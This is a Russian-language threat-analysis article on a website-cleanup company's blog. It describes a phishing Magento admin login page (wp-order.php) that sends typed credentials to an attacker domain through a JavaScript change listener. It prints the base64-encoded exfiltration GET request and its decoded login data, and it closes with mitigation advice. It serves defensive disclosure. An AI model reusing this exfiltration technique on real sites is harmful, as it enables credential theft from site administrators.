Размер шрифта
Цвет фона и шрифта
Изображения
Озвучивание текста
Обычная версия сайта
Лечение сайта от вирусов и вредоносного кода
Лечение сайтов от вирусов. Восстановление функционала сайта после взлома.
+375 29 236 68 17
+375 29 236 68 17
E-mail
support@stopvirus.by
Адрес
Республика Беларусь г. Минск, ул. Герасименко 29
Режим работы
24/7 круглосуточно
Компания
  • О компании
  • История
  • Партнеры
  • Отзывы
  • Реквизиты
  • Документы
  • Вопросы и ответы
Продукты
  • Антивирус для сайта
  • Хостинг
Услуги
  • Удаление вирусов с сайта
    • Комплексная защита
    • Диагностика безопасности
    • Сайт под наблюдением
    • Срочная помощь
  • Доработка сайта
    • Доработка разработка сайта на Bitrix
  • Обслуживание ПК NEW
    • Ремонт ноутбуков
    • Ремонт компьютеров
    • Установка Windows
    • Настройка сетей Ethernet
Акции
Новости
Статьи
Информация
  • Прейскурант цен
  • Пользовательское соглашение
  • Политика конфиденциальности
  • Вопрос-ответ
Контакты
Республика Беларусь г. Минск, ул. Герасименко 29
...
+375 29 236 68 17
+375 29 236 68 17
E-mail
support@stopvirus.by
Адрес
Республика Беларусь г. Минск, ул. Герасименко 29
Режим работы
24/7 круглосуточно
Лечение сайта от вирусов и вредоносного кода
Лечение сайтов от вирусов. Восстановление функционала сайта после взлома.
Компания
  • О компании
  • История
  • Партнеры
  • Отзывы
  • Реквизиты
  • Документы
  • Вопросы и ответы
Продукты
  • Антивирус для сайта
    Антивирус для сайта
  • Хостинг
    Хостинг
Услуги
  • Удаление вирусов с сайта
    Удаление вирусов с сайта
    • Комплексная защита
    • Диагностика безопасности
    • Сайт под наблюдением
    • Срочная помощь
  • Доработка сайта
    Доработка сайта
    • Доработка разработка сайта на Bitrix
  • Обслуживание ПК  NEW
    Обслуживание ПК NEW
    • Ремонт ноутбуков
    • Ремонт компьютеров
    • Установка Windows
    • Настройка сетей Ethernet
Акции
Новости
Статьи
Информация
  • Прейскурант цен
  • Пользовательское соглашение
  • Политика конфиденциальности
  • Вопрос-ответ
Контакты
    Лечение сайта от вирусов и вредоносного кода
    Компания
    • О компании
    • История
    • Партнеры
    • Отзывы
    • Реквизиты
    • Документы
    • Вопросы и ответы
    Продукты
    • Антивирус для сайта
      Антивирус для сайта
    • Хостинг
      Хостинг
    Услуги
    • Удаление вирусов с сайта
      Удаление вирусов с сайта
      • Комплексная защита
      • Диагностика безопасности
      • Сайт под наблюдением
      • Срочная помощь
    • Доработка сайта
      Доработка сайта
      • Доработка разработка сайта на Bitrix
    • Обслуживание ПК  NEW
      Обслуживание ПК NEW
      • Ремонт ноутбуков
      • Ремонт компьютеров
      • Установка Windows
      • Настройка сетей Ethernet
    Акции
    Новости
    Статьи
    Информация
    • Прейскурант цен
    • Пользовательское соглашение
    • Политика конфиденциальности
    • Вопрос-ответ
    Контакты
      +375 29 236 68 17
      E-mail
      support@stopvirus.by
      Адрес
      Республика Беларусь г. Минск, ул. Герасименко 29
      Режим работы
      24/7 круглосуточно
      Лечение сайта от вирусов и вредоносного кода
      Телефоны
      +375 29 236 68 17
      E-mail
      support@stopvirus.by
      Адрес
      Республика Беларусь г. Минск, ул. Герасименко 29
      Режим работы
      24/7 круглосуточно
      Лечение сайта от вирусов и вредоносного кода
      • Компания
        • Компания
        • О компании
        • История
        • Партнеры
        • Отзывы
        • Реквизиты
        • Документы
        • Вопросы и ответы
      • Продукты
        • Продукты
        • Антивирус для сайта
        • Хостинг
      • Услуги
        • Услуги
        • Удаление вирусов с сайта
          • Удаление вирусов с сайта
          • Комплексная защита
          • Диагностика безопасности
          • Сайт под наблюдением
          • Срочная помощь
        • Доработка сайта
          • Доработка сайта
          • Доработка разработка сайта на Bitrix
        • Обслуживание ПК NEW
          • Обслуживание ПК NEW
          • Ремонт ноутбуков
          • Ремонт компьютеров
          • Установка Windows
          • Настройка сетей Ethernet
      • Акции
      • Новости
      • Статьи
      • Информация
        • Информация
        • Прейскурант цен
        • Пользовательское соглашение
        • Политика конфиденциальности
        • Вопрос-ответ
      • Контакты
      • +375 29 236 68 17
        • Телефоны
        • +375 29 236 68 17
      • Республика Беларусь г. Минск, ул. Герасименко 29
      • support@stopvirus.by
      • 24/7 круглосуточно

      Еженедельное обновление Magento Фишинг Использует JavaScript

      Главная
      —
      Статьи
      —
      Новые вирусы
      —Еженедельное обновление Magento Фишинг Использует JavaScript
      Еженедельное обновление Magento Фишинг Использует JavaScript
      Новые вирусы

      Во время недавнего расследования на скомпрометированном веб-сайте была обнаружена фишинговая страница входа администратора Magento с именем файла wp-order.php. Это странный выбор имени файла для фишинговой страницы Magento, но тем не менее он успешно загружает законно выглядящий Magento 1.x страница входа в систему.

      Фишинг Админ Панели Magento

      Однако то, что не сразу видно или очевидно жертвам, заключается в том, что элементы страницы, такие как изображения и структура CSS, почти все загружаются из вредоносного домена — orderline[.] клуб:

      Вредоносный Домен

      Сбор Учетных Данных Для Входа В Magento

      Для эксфильтрации украденных данных фишинговая страница использует метод, который не требует отдельного PHP-файла или полагается на PHP-функции для отправки электронной почты злоумышленнику, что мы часто находим для эксфильтрации на фишинговых страницах, подобных этой.

      Вместо этого эта фишинговая атака использует метод JavaScript EventListener (addEventListener) с событием change для полей username и login (password) :

      После того как имя пользователя и пароль введены и жертва меняет фокус страницы (например, щелкает) вне полей входа в систему, фишинговая страница автоматически отправляет запрос GET на URL-адрес orderline [.] клуб/fget.php с украденными регистрационными данными.

      GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0l3dwlw9yzgvylnboccisimxvz2luijoiywrtaw4ilcjwyxnzijoiywrtaw4ifq==
      

      Этот GIF демонстрирует, как отправляется запрос GET, когда кто-то вводит данные для входа в поля, независимо от того, нажимает ли он кнопку входа:

      Эксфильтрация Данных

      Как вы можете видеть, украденные регистрационные данные кодируются base64 и отправляются в качестве запроса злоумышленнику. Если вы декодируете base64 из отправленного запроса GET, то вам останется только:

      {"url":"http://localhost/wp-order.php","login":"admin","pass":"admin"}
      

      Заключение И Меры По Смягчению Последствий

      Сам код, по-видимому, указывает на то, что эта фишинговая страница все еще находится в стадии разработки злоумышленником, поэтому вполне возможно, что в будущем этот стиль эксфильтрации станет более популярным на фишинговых страницах.

      Фишинг может быть трудно обнаружить, но владельцы веб-сайтов могут использовать решение для мониторинга целостности файлов, чтобы помочь выявить признаки компрометации. Google Search Console также может пригодиться для получения уведомлений о проблемах безопасности, таких как фишинг.

      • Комментарии
      Загрузка комментариев...
      Назад к списку
      • CMS 4
      • Новости 11
      • Новые вирусы 44
      • Партнеры 6
      Подписывайтесь
      на новости и акции
      Компания
      О компании
      История
      Партнеры
      Отзывы
      Реквизиты
      Документы
      Вопросы и ответы
      Каталог
      Антивирус для сайта
      Хостинг
      Услуги
      Удаление вирусов с сайта
      Доработка сайта
      Обслуживание ПК NEW
      Прейскурант цен
      Вопрос-ответ
      Политика конфиденциальности
      Пользовательское соглашение
      +375 29 236 68 17
      +375 29 236 68 17
      E-mail
      support@stopvirus.by
      Адрес
      Республика Беларусь г. Минск, ул. Герасименко 29
      Режим работы
      24/7 круглосуточно
      support@stopvirus.by
      Республика Беларусь г. Минск, ул. Герасименко 29
      © 2026 Лечение сайта от вирусов и вредоносного кода СтопВирус
      Политика конфиденциальности
      Главная Продукты Контакты Услуги FAQ Реквизиты